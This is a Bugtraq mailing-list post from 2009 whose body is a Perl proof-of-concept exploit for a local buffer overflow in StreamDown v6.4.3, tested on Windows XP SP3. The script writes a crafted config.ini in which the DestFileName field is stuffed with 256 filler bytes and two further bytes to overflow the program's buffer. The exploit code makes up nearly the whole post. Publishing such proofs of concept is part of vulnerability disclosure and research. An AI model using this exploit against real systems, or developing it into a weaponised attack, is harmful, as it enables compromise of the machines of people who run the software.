[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
StreamDown v6.4.3 Local Buffer Overflow PoC
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: StreamDown v6.4.3 Local Buffer Overflow PoC
- From: todor.donev@xxxxxxxxx
- Date: 2 Feb 2009 13:36:52 -0000
#!perl
#
# StreamDown v6.4.3 Local Buffer Overflow Exploit (0day)
# -------------------------------------------------------
# Research & Exploit [Todor Donev :: todor.donev@xxxxxxxxx]
# -------------------------------------------------------
# Shareware software for downloading and stream ripping
#
# Tested on Windows XP SP3
# Proof Of Concept
#
# Best regards and be safe,
# Todor Donev
#
$overflow = "\x41" x 256;
$x = "\x05\x01";
open(my $config, "> config.ini");
print $config "[SnifferPos]\n".
"X=300\n".
"Y=5\n".
"state=0\n".
"[TimeOut]\n".
"Default=30\n".
"[Proxy]\n".
"server=\n".
"port=\n".
"enable=0\n".
"[DestPath]\n".
"Default=c:MyDownloads\n".
"[Down]\n".
"Count=1\n".
"[0]\n".
"URL=\n".
"DestFileName=c:MyDownloadshttp".
$overflow.$x."\n".
"State=5\n".
"TotalSize=0\n";
close $config;